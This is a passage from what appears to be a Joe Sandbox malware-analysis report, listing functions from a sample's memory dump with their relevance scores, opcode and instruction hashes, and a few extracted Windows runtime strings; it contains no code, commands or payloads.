              • Instruction ID: 0019028c5fe3d3319bbd215de92dd5e86541822ad5e929f12089fb6fc8041514
              • Opcode Fuzzy Hash: 2b9a557a82f890365b654b6d2082ea2bf7b50d718ce48c9bb448b0615042058f
              • Instruction Fuzzy Hash: 98F0C875640309BBEB24EA4DDD42F977F68EB84B58F51005AF6047B395D1F0A940CA91
              Function 013C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
              Download Yara Rule
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: ___swprintf_l
              • String ID: #%u
              • API String ID: 48624451-232158463
              • Opcode ID: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
              • Instruction ID: 2c32e8ba161e594422a84261333b95273137a595c7bdd94b8ca1ba5925cff950
              • Opcode Fuzzy Hash: c44021722dcdeeb37e6e979136a1a689c7e9ced5938e9a38de0850c675eeabd5
              • Instruction Fuzzy Hash: 44715C71A0014A9FDB05DFA9C994BAEB7F8FF18704F15406AE905E7261EB34ED01CBA0
              Function 013C52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: @$@
              • API String ID: 0-149943524
              • Opcode ID: 2adc094d79025e6195ac2082cb023928f9fa73ff0d44353ddd21d1164dc74100
              • Instruction ID: 83e041db54c5b9d9fc5f91e1848bf03dae0b1de2ccdfbcf9a33e2a785d95b0d1
              • Opcode Fuzzy Hash: 2adc094d79025e6195ac2082cb023928f9fa73ff0d44353ddd21d1164dc74100
              • Instruction Fuzzy Hash: 96327B716083128BDB24CF18C48077FBBE5EF84B58F15491EEA85976A0E774EC94CB52
              Function 0147A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: `$`
              • API String ID: 0-197956300
              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
              • Instruction ID: cab5d24b21fc1038804d125b04219d735143ff7776ed248051fa0ef0d873dd02
              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
              • Instruction Fuzzy Hash: 2FC1D4312043429BE724CF29C845BAFBBE5AFD4718F284A2EF695CB2A0D775D505CB41
              Function 013BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
              Download Yara Rule
              Strings
              • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
              • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
              • API String ID: 0-2876891731
              • Opcode ID: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
              • Instruction ID: 86d3173767fc187c5f0be1c2aa6b1ec80f9ec9d16f90057553be64f24ac8a37c
              • Opcode Fuzzy Hash: a4b9492d2527830f8fc6696e7f79288922565c926503e5e41b343519d8b7fc84
              • Instruction Fuzzy Hash: F341B031A05A59DBDB11DF5DC480BAE7BB4FF84708F24406AEA08DBBA5E3B5D900CB50
              Function 014435BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
              • API String ID: 0-118005554
              • Opcode ID: 0c103e3a7c229be3006f931b665704e2294283c3be59d8b83f8abb2be2eaa064
              • Instruction ID: 1768788b4a94275ae8b37962a3f1263ba876ca1abab8c9fd643e5b43c90ec43c
              • Opcode Fuzzy Hash: 0c103e3a7c229be3006f931b665704e2294283c3be59d8b83f8abb2be2eaa064
              • Instruction Fuzzy Hash: D43180312087529BE321DF68D454B2ABBE4FF95B14F15086AFD588B3A0E631D905CB52
              Function 013E329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: .Local\$@
              • API String ID: 0-380025441
              • Opcode ID: ab25d92dfcb30259de117d6d834897b6df020f57c101632ccd87fab90b006458
              • Instruction ID: 3c2d199ea048f0d0bd4d0ad47753664c4522e85c85a94d0ccefbad5f116f9dc9
              • Opcode Fuzzy Hash: ab25d92dfcb30259de117d6d834897b6df020f57c101632ccd87fab90b006458
              • Instruction Fuzzy Hash: 9D317072548315AFD721DF28C484EABBBE8FF85658F44092EF99583390DA31DD04CB92
              Function 013EA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID: Cleanup Group$Threadpool!
              • API String ID: 2994545307-4008356553
              • Opcode ID: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
              • Instruction ID: 0597a406809cbf1e97d95ed8206166a20244d445aa1b20ac56fc4b2bc1c218da
              • Opcode Fuzzy Hash: 3f7c34b7d31cf3c587593949c98b315699cbe95d3d2420713857caa99ad077ed
              • Instruction Fuzzy Hash: 1E01D1B2250704AFD311DF24CE49B167BE8F785729F068979A658C71D0E334D804CB46
              Function 013B7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3b7decdb014c5d9cacd0c49c188d4fbd0d3edc9ecc092ca555aa40324efc598d
              • Instruction ID: 7ef8a6ea21f7689215e1be43b01f73ebe1309a051793abef9361e8ed9fa866fe
              • Opcode Fuzzy Hash: 3b7decdb014c5d9cacd0c49c188d4fbd0d3edc9ecc092ca555aa40324efc598d
              • Instruction Fuzzy Hash: 12A15971608346CFC321DF28C480A6ABBE9FBD8718F15492EE68597791E730E945CB92
              Function 01436420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
              • Instruction ID: 1b07fe068d89d35f33d288629efcc27ccca211ac7c99e2a337f69595e1446181
              • Opcode Fuzzy Hash: a86e51bef6377dd8b10edc2a8e52850e01924d5493fdb97b4d5e5ec5890aaa9a
              • Instruction Fuzzy Hash: 2191637290021ABFEB21DB99DC85FAE7BB8EF58B54F154065F604AB1A0D674AD00CB60
              Function 0146B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: PreferredUILanguages
              • API String ID: 0-1884656846
              • Opcode ID: e0ff4c08ceeee7da92d403674dd28f4dc8191e213d2a578e931940a668727d9e
              • Instruction ID: 54c68f2de02a2ea2910ff4ebbb8ca3a9d8cda8077b91cb2fd7ecfe3184953c4f
              • Opcode Fuzzy Hash: e0ff4c08ceeee7da92d403674dd28f4dc8191e213d2a578e931940a668727d9e
              • Instruction Fuzzy Hash: E5419632F00219ABDB11EA98C840AEFB7BDEF54658F054167EE11E7360E630DE80C7A1
              Function 0145705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: kLsE
              • API String ID: 0-3058123920
              • Opcode ID: 5f7f7cce33f6701824b315c8b9e563a398799964678513f3fa4f3fb8c9c9bc2c
              • Instruction ID: 0d61fe92bd44ebf87166b327615a667bd8f31672309ad4e78bb18f34ff9a322f
              • Opcode Fuzzy Hash: 5f7f7cce33f6701824b315c8b9e563a398799964678513f3fa4f3fb8c9c9bc2c
              • Instruction Fuzzy Hash: 60419E7150135247E731AB79E8847AA3FD4A710B68F9F012EEE504B2FACBB40482C791
              Function 013E7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: #
              • API String ID: 0-1885708031
              • Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
              • Instruction ID: 28b29160cc6234be826418eba8cf61c1dbf74430296fb40ab0089bf1a04313fb
              • Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
              • Instruction Fuzzy Hash: 8341CF75A0026AEBCF21DF88C494BBEB7B5FF44709F00445AE945A7290DB34D982CBE1
              Function 013B5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: Actx
              • API String ID: 0-89312691
              • Opcode ID: 56a2d9bcf915c55503884ead6ae718bdd344e276f012ef4825e6012b7bf9e475
              • Instruction ID: 2f2340dd00b5364a632c63ebc4ae8d350bdba68fd9a31cc7e8887320035e00f2
              • Opcode Fuzzy Hash: 56a2d9bcf915c55503884ead6ae718bdd344e276f012ef4825e6012b7bf9e475
              • Instruction Fuzzy Hash: 2B11E63074420A8BEB245D0D88D06F6B799EB9122CF34813AEB62CBF91F671DC408380
              Function 0143106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON
              Download Yara Rule
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID: LdrCreateEnclave
              • API String ID: 0-3262589265
              • Opcode ID: e75c0daf433e35a39b23494cd0ad26ef9d880b3f54dbaca45365933156c2abbf
              • Instruction ID: 87f20f2cf76d5305dd8a61ab69b2f7d9f7bd23f9ba724f7986e1299b780c7cdb
              • Opcode Fuzzy Hash: e75c0daf433e35a39b23494cd0ad26ef9d880b3f54dbaca45365933156c2abbf
              • Instruction Fuzzy Hash: 5121F5B15083449BC710DF1A8844A9BFBE8FBE9B50F404A1FB99497360E7B09504CB92
              Function 0140739A Relevance: .7, Instructions: 705COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 349887e03f75cdfeef95afdfcdc773d17030fcb9e035a7094b9ea67d4665657e
              • Instruction ID: bf6539c57c50760eca8720b8bdab49c58a49add30d0f731d5fd3a589914d7c45
              • Opcode Fuzzy Hash: 349887e03f75cdfeef95afdfcdc773d17030fcb9e035a7094b9ea67d4665657e
              • Instruction Fuzzy Hash: AA42B171A006168FDB16CF5EC4805BEBBB2FF88315B14856ED586AB3A0D734F842CB91
              Function 013DB2C0 Relevance: .6, Instructions: 629COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 703dda2d071d682e881af16b4bbb8468bd006442056d8181e151cb6e3eb56902
              • Instruction ID: cfc9c55156cf0b2e5e626bca5f746cccda22f845300494d6337194dd22922edb
              • Opcode Fuzzy Hash: 703dda2d071d682e881af16b4bbb8468bd006442056d8181e151cb6e3eb56902
              • Instruction Fuzzy Hash: 2332A076E00219DBDF14CFA8D880BAEBBB5FF55718F1A002DE905AB395E7359901CB90
              Function 01448158 Relevance: .6, Instructions: 617COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
              • Instruction ID: 07379212290d5343c860e2aa76d84ee4256dd383e6d49ce479dd5b4698ea8c61
              • Opcode Fuzzy Hash: afc8d9ce34d43c1312ea6fbccf285083efd2a83be0dd7e6433cf837f405aadd5
              • Instruction Fuzzy Hash: 18424E75A0021A8FEB25CFA9C841BAEBBF5BF48304F14809AE949AB251D7349D85CF50
              Function 0145A118 Relevance: .6, Instructions: 591COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
              • Instruction ID: 31693a9e7d725d8395b0686ede8bd8cd50d418a57adb348ba8c55ff7d2b19e1a
              • Opcode Fuzzy Hash: 77828ba64fff03b37547fa4e5d3e442368ce97206aa831e8fd6ab5823cfeaf62
              • Instruction Fuzzy Hash: 5822CE702046618BEBA5CF29C094772BBE1AF45344F28865BED868F3A7E735D442CB61
              Function 013B65D0 Relevance: .4, Instructions: 383COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
              • Instruction ID: 0e5b7902f26de3929fcfbae9ce4e1622b67bb8185a15036367489a84fb67251a
              • Opcode Fuzzy Hash: 6953a03bb36781df7cc7ffd60fc7a301d35e47afa8436831e1a3baa431a8be5e
              • Instruction Fuzzy Hash: 65E181B1608341CFC715CF28C5D1AAABBE0FF89318F05896DE69587752EB31E905CB92
              Function 013A8397 Relevance: .4, Instructions: 380COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
              • Instruction ID: c5666e317972d7f94bf33756eedd99ef4f934b1f55f2ec7d4844e4d2fdb5ba91
              • Opcode Fuzzy Hash: 58086cd98e11042ae540ee16d7503be1de2eefa00fb89b8f55806e40a4fe1cc5
              • Instruction Fuzzy Hash: 80D10371A0020A8BDB15DF29C880EBB7BB5FF54309F4446AEEA16DB2D0EB34D951CB50
              Function 01438243 Relevance: .3, Instructions: 322COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
              • Instruction ID: 3634af39eba01431c25e9dbab5995feffe0a222d2431b9bc0873dbd9d115a000
              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
              • Instruction Fuzzy Hash: 8AB16274A006069FDF24DB99C940AABFBB9FFD8304F10456EBA12977E1DA35E905CB10
              Function 013CF460 Relevance: .3, Instructions: 321COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fc38fa213b06585c4fab493a5cc968d33a7c11d23d26c94aade595ef69f189ab
              • Instruction ID: 4c7844fe7d491dc0148c672f07529e0a7711cb19d05667117a3216ce11d76b54
              • Opcode Fuzzy Hash: fc38fa213b06585c4fab493a5cc968d33a7c11d23d26c94aade595ef69f189ab
              • Instruction Fuzzy Hash: C5C13531A00215CBDB25CF2DC4947B9BBAAFB54B2CF1A416EED469B3A6D7308D50CB50
              Function 013C0535 Relevance: .3, Instructions: 300COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
              • Instruction ID: bae3b0c6569c1a4ce69d3e20fa99864372206e039fb20f66be35b0e0ed6a4a73
              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
              • Instruction Fuzzy Hash: 41B13635604686DFDB19CBA8C850BBEBBFAAF84708F18015AE6529B395D730ED41CB50
              Function 013D90DB Relevance: .3, Instructions: 287COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID: InitializeThunk
              • String ID:
              • API String ID: 2994545307-0
              • Opcode ID: e01857df817c528634ad1907237f996d9fb6082fb984a8a5b9e11f511b120e85
              • Instruction ID: de64bbb5e94c61586bb51450c5ce40c27bb41021385806b5079f40147e7d61f4
              • Opcode Fuzzy Hash: e01857df817c528634ad1907237f996d9fb6082fb984a8a5b9e11f511b120e85
              • Instruction Fuzzy Hash: 1BA12CB190021AAFEF129FA8CC45BAF7BB9AF55754F014058FA04AB2A0D775DC51CBA0
              Function 013B83C0 Relevance: .3, Instructions: 281COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
              • Instruction ID: 1650673bd1b780b339df0a0d7546776a040494a6c24fe9eec15f3a877b7ebcef
              • Opcode Fuzzy Hash: 8b2497953fc54c89ea9e2a2afd4017126234c780e25a03c6eeab11129acdbd7b
              • Instruction Fuzzy Hash: 50C14774208341CFD764DF19C484BABB7E8BF88708F44496EEA8987791E774E904CB92
              Function 013AC427 Relevance: .3, Instructions: 280COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
              • Instruction ID: dc7c8b87994a9070705a072a4cf637f69aa0c02711669dc76d9b4638a0846e68
              • Opcode Fuzzy Hash: 079831cf5c8cf3111051660c41a96b51c658fcf3ea2b5971434d89ab5d073fe8
              • Instruction Fuzzy Hash: 24B19470A002698BDB25CF59C890BA9B7B5EF44704F5485EAE54AEB391EB30DDC5CF20
              Function 013DE5E7 Relevance: .3, Instructions: 278COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a34dc1c2184b4cfdb7738cf7ce6ffb5eb93e1f120de47ce4170a0c9aedfe2164
              • Instruction ID: f4372e71fab28224e28841624a4077d71157d4047697cb242cf28602bd330a20
              • Opcode Fuzzy Hash: a34dc1c2184b4cfdb7738cf7ce6ffb5eb93e1f120de47ce4170a0c9aedfe2164
              • Instruction Fuzzy Hash: 70A12832E006199FEB21DB5CD844BAEBFB4BB00758F050126EA10AB2E5D7749D4ACBD1
              Function 013F0185 Relevance: .3, Instructions: 276COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
              • Instruction ID: 9f6e04e2cab45b0f821a9d3206604490161b1caa754e383bd2045b3d90fa16e0
              • Opcode Fuzzy Hash: 0a83b1cfeeeb902fd9047c3e37d6912410631e46aabfb7531a63fae07fbf3d9d
              • Instruction Fuzzy Hash: 26A1C771B00626DBDB29CF6DC590B6AB7E6FF54318F04402EEB05A7292DB74E851CB50
              Function 01484500 Relevance: .3, Instructions: 275COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
              • Instruction ID: 6a5c4765c2292b3294126db13a5f7d5515c0f805843a2f15706b6e757d250d6e
              • Opcode Fuzzy Hash: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
              • Instruction Fuzzy Hash: 38A1CC72A10212DFC711EF18C980B6ABBE9FF58708F4A452EE6499B760D734ED01CB91
              Function 014360E0 Relevance: .3, Instructions: 264COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
              • Instruction ID: 736a6d833cfbef1ec66fe06ae8b6d56f8ef6017a90a30e58949a52f2937e4c3a
              • Opcode Fuzzy Hash: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
              • Instruction Fuzzy Hash: 02917371D00216BFDF15DF68D884BAEBFB5AB88710F16415AE610EB361D734EA019BA0
              Function 013CE3F0 Relevance: .3, Instructions: 261COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 94b64e278abaf5b661dbdbc0148e723686cad9b2c3e5da3cc03db8479f23089f
              • Instruction ID: a4387c32ef07413e9243568ba2159843c7aa2b27d4767fdb18dc47828a605437
              • Opcode Fuzzy Hash: 94b64e278abaf5b661dbdbc0148e723686cad9b2c3e5da3cc03db8479f23089f
              • Instruction Fuzzy Hash: E2910532A00616CBEB24DB5DC444B7ABFA6EFA4B18F19407EED05AB394EA34DD01C751
              Function 013B1131 Relevance: .3, Instructions: 259COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 59ceadc8c3e614101b41ec007358249d5b1a313bb2aeafe6560887a0c9cc73ae
              • Instruction ID: 6b5caa3f3e20117937c1ec1e0a143bd02ca6b46b235f3af90053a2a1cf66ec6d
              • Opcode Fuzzy Hash: 59ceadc8c3e614101b41ec007358249d5b1a313bb2aeafe6560887a0c9cc73ae
              • Instruction Fuzzy Hash: 5BB103B15083418FD365CF29C580A6AFBF1BB88704F18496EF999DB362D731E945CB42
              Function 0146B52F Relevance: .2, Instructions: 222COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.1755522703.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_1380000_8tvMmyxveyzFcnJ.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
              • Instruction ID: 390ea26a94d4e394747926b6a820cdb0083b18223b5591ae91601c724ea03659
              • Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
              • Instruction Fuzzy Hash: 1F718075B0021A9BDB20CE69C480ABFBBFDEF54749F59412BD940DB361E338D9418B92
              Function 013DD090 Relevance: .2, Instructions: 217COMMON
              Download Yara Rule
              Memory Dump Source
